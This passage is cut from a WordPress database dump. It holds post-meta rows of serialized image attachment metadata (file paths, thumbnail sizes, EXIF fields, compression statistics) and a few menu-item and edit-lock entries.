005086701_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117065;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:59:\"17992072_1641106229237145_7019424871005086701_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30429;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:58:\"17992072_1641106229237145_7019424871005086701_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3497;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(477,408,'_wp_attached_file','2022/08/23915753_1868197049861394_4966732368910344520_n-1.jpg'),(478,408,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:61:\"2022/08/23915753_1868197049861394_4966732368910344520_n-1.jpg\";s:8:\"filesize\";i:142469;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"23915753_1868197049861394_4966732368910344520_n-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20706;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"23915753_1868197049861394_4966732368910344520_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8097;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:61:\"23915753_1868197049861394_4966732368910344520_n-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115361;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:61:\"23915753_1868197049861394_4966732368910344520_n-1-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31257;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:60:\"23915753_1868197049861394_4966732368910344520_n-1-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3834;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(479,409,'_wp_attached_file','2022/08/32871742_2062360347111729_638238904759091200_n.jpg'),(480,409,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:58:\"2022/08/32871742_2062360347111729_638238904759091200_n.jpg\";s:8:\"filesize\";i:62770;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:58:\"32871742_2062360347111729_638238904759091200_n-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12008;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:58:\"32871742_2062360347111729_638238904759091200_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6342;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:58:\"32871742_2062360347111729_638238904759091200_n-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55220;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:58:\"32871742_2062360347111729_638238904759091200_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21453;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:57:\"32871742_2062360347111729_638238904759091200_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3349;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(481,410,'_wp_attached_file','2022/08/33584475_2069581393056291_797039715596369920_n.jpg'),(482,410,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:58:\"2022/08/33584475_2069581393056291_797039715596369920_n.jpg\";s:8:\"filesize\";i:87104;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:58:\"33584475_2069581393056291_797039715596369920_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13812;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:58:\"33584475_2069581393056291_797039715596369920_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5043;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:58:\"33584475_2069581393056291_797039715596369920_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72152;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:58:\"33584475_2069581393056291_797039715596369920_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20765;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:57:\"33584475_2069581393056291_797039715596369920_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3077;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(483,411,'_wp_attached_file','2022/08/248413504_4961941493820252_6022205579321516239_n.jpg'),(484,411,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:60:\"2022/08/248413504_4961941493820252_6022205579321516239_n.jpg\";s:8:\"filesize\";i:123392;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"248413504_4961941493820252_6022205579321516239_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19654;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"248413504_4961941493820252_6022205579321516239_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7001;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"248413504_4961941493820252_6022205579321516239_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107932;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:60:\"248413504_4961941493820252_6022205579321516239_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31037;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:59:\"248413504_4961941493820252_6022205579321516239_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3248;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(485,412,'_wp_attached_file','2022/08/280659088_5602458996435162_2458487168335242841_n.jpg'),(486,412,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:60:\"2022/08/280659088_5602458996435162_2458487168335242841_n.jpg\";s:8:\"filesize\";i:575141;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"280659088_5602458996435162_2458487168335242841_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19341;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"280659088_5602458996435162_2458487168335242841_n-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:198258;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"280659088_5602458996435162_2458487168335242841_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6935;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"280659088_5602458996435162_2458487168335242841_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115162;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"280659088_5602458996435162_2458487168335242841_n-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:422425;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:60:\"280659088_5602458996435162_2458487168335242841_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28948;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:59:\"280659088_5602458996435162_2458487168335242841_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3494;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(487,413,'_wp_attached_file','2022/08/c60adea113fb2f5f80419bb170309509.jpg'),(488,413,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:594;s:6:\"height\";i:376;s:4:\"file\";s:44:\"2022/08/c60adea113fb2f5f80419bb170309509.jpg\";s:8:\"filesize\";i:42174;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:44:\"c60adea113fb2f5f80419bb170309509-300x190.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11230;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:44:\"c60adea113fb2f5f80419bb170309509-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5308;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:44:\"c60adea113fb2f5f80419bb170309509-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20487;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:43:\"c60adea113fb2f5f80419bb170309509-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2543;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(489,414,'_wp_attached_file','2022/08/DSC03903-1.jpg'),(490,414,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:784;s:6:\"height\";i:588;s:4:\"file\";s:22:\"2022/08/DSC03903-1.jpg\";s:8:\"filesize\";i:69402;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"DSC03903-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14807;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC03903-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6074;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"DSC03903-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72900;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:22:\"DSC03903-1-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22680;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:21:\"DSC03903-1-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2820;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(518,215,'_edit_lock','1661280614:1'),(519,434,'_menu_item_type','post_type'),(520,434,'_menu_item_menu_item_parent','0'),(521,434,'_menu_item_object_id','166'),(522,434,'_menu_item_object','page'),(523,434,'_menu_item_target',''),(524,434,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(525,434,'_menu_item_xfn',''),(526,434,'_menu_item_url',''),(534,166,'_edit_lock','1661363677:1'),(528,396,'_wp_old_date','2022-08-22'),(529,397,'_wp_old_date','2022-08-22'),(530,398,'_wp_old_date','2022-08-22'),(531,399,'_wp_old_date','2022-08-22'),(532,400,'_wp_old_date','2022-08-22'),(533,403,'_wp_old_date','2022-08-22'),(535,436,'_wp_attached_file','2022/08/12038053_1138498862831220_6417864339135922840_n.jpg'),(536,436,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2022/08/12038053_1138498862831220_6417864339135922840_n.jpg\";s:8:\"filesize\";s:6:\"139818\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"12038053_1138498862831220_6417864339135922840_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"20520\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"12038053_1138498862831220_6417864339135922840_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"9549\";}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"12038053_1138498862831220_6417864339135922840_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:6:\"103196\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:59:\"12038053_1138498862831220_6417864339135922840_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"30573\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:58:\"12038053_1138498862831220_6417864339135922840_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"6054\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(537,436,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.57676641631154;s:5:\"bytes\";i:19668;s:11:\"size_before\";i:169892;s:10:\"size_after\";i:150224;s:4:\"time\";d:0.21000000000000002;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:51.19;s:5:\"bytes\";i:3099;s:11:\"size_before\";i:6054;s:10:\"size_after\";i:2955;s:4:\"time\";d:0.02;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.01;s:5:\"bytes\";i:3152;s:11:\"size_before\";i:9549;s:10:\"size_after\";i:6397;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.71;s:5:\"bytes\";i:3887;s:11:\"size_before\";i:30573;s:10:\"size_after\";i:26686;s:4:\"time\";d:0.04;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.2;s:5:\"bytes\";i:3529;s:11:\"size_before\";i:20520;s:10:\"size_after\";i:16991;s:4:\"time\";d:0.03;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.82;s:5:\"bytes\";i:6001;s:11:\"size_before\";i:103196;s:10:\"size_after\";i:97195;s:4:\"time\";d:0.1;}}}'),(538,437,'_wp_attached_file','2022/08/15895119_1523671777647258_1853174486573971799_n.jpg'),(539,437,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2022/08/15895119_1523671777647258_1853174486573971799_n.jpg\";s:8:\"filesize\";s:5:\"85144\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"15895119_1523671777647258_1853174486573971799_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"16099\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"15895119_1523671777647258_1853174486573971799_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"6441\";}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"15895119_1523671777647258_1853174486573971799_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"75198\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:59:\"15895119_1523671777647258_1853174486573971799_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"22694\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:58:\"15895119_1523671777647258_1853174486573971799_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"3388\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(540,437,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.9048618963010826;s:5:\"bytes\";i:4835;s:11:\"size_before\";i:123820;s:10:\"size_after\";i:118985;s:4:\"time\";d:0.18;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.71;s:5:\"bytes\";i:561;s:11:\"size_before\";i:6441;s:10:\"size_after\";i:5880;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.19;s:5:\"bytes\";i:447;s:11:\"size_before\";i:3388;s:10:\"size_after\";i:2941;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.89;s:5:\"bytes\";i:788;s:11:\"size_before\";i:16099;s:10:\"size_after\";i:15311;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.24;s:5:\"bytes\";i:962;s:11:\"size_before\";i:22694;s:10:\"size_after\";i:21732;s:4:\"time\";d:0.06;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.76;s:5:\"bytes\";i:2077;s:11:\"size_before\";i:75198;s:10:\"size_after\";i:73121;s:4:\"time\";d:0.09;}}}'),(541,438,'_wp_attached_file','2022/08/17992072_1641106229237145_7019424871005086701_n-1.jpg'),(542,438,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:61:\"2022/08/17992072_1641106229237145_7019424871005086701_n-1.jpg\";s:8:\"filesize\";s:6:\"147117\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"17992072_1641106229237145_7019424871005086701_n-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"19637\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"17992072_1641106229237145_7019424871005086701_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"6925\";}s:12:\"medium_large\";a:5:{s:4:\"file\";s:61:\"17992072_1641106229237145_7019424871005086701_n-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:6:\"117065\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:61:\"17992072_1641106229237145_7019424871005086701_n-1-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"30429\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:60:\"17992072_1641106229237145_7019424871005086701_n-1-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"3497\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(543,438,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.920784216543793;s:5:\"bytes\";i:8737;s:11:\"size_before\";i:177553;s:10:\"size_after\";i:168816;s:4:\"time\";d:0.26;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.61;s:5:\"bytes\";i:441;s:11:\"size_before\";i:3497;s:10:\"size_after\";i:3056;s:4:\"time\";d:0.03;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.83;s:5:\"bytes\";i:1470;s:11:\"size_before\";i:30429;s:10:\"size_after\";i:28959;s:4:\"time\";d:0.03;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.18;s:5:\"bytes\";i:497;s:11:\"size_before\";i:6925;s:10:\"size_after\";i:6428;s:4:\"time\";d:0.06;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.4;s:5:\"bytes\";i:1060;s:11:\"size_before\";i:19637;s:10:\"size_after\";i:18577;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.5;s:5:\"bytes\";i:5269;s:11:\"size_before\";i:117065;s:10:\"size_after\";i:111796;s:4:\"time\";d:0.12;}}}'),(544,439,'_wp_attached_file','2022/08/18033389_1641106099237158_2286138393352834454_n.jpg'),(545,439,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2022/08/18033389_1641106099237158_2286138393352834454_n.jpg\";s:8:\"filesize\";s:5:\"64622\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"18033389_1641106099237158_2286138393352834454_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"10831\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"18033389_1641106099237158_2286138393352834454_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"4358\";}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"18033389_1641106099237158_2286138393352834454_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"57400\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:59:\"18033389_1641106099237158_2286138393352834454_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"15818\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:58:\"18033389_1641106099237158_2286138393352834454_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"2454\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"c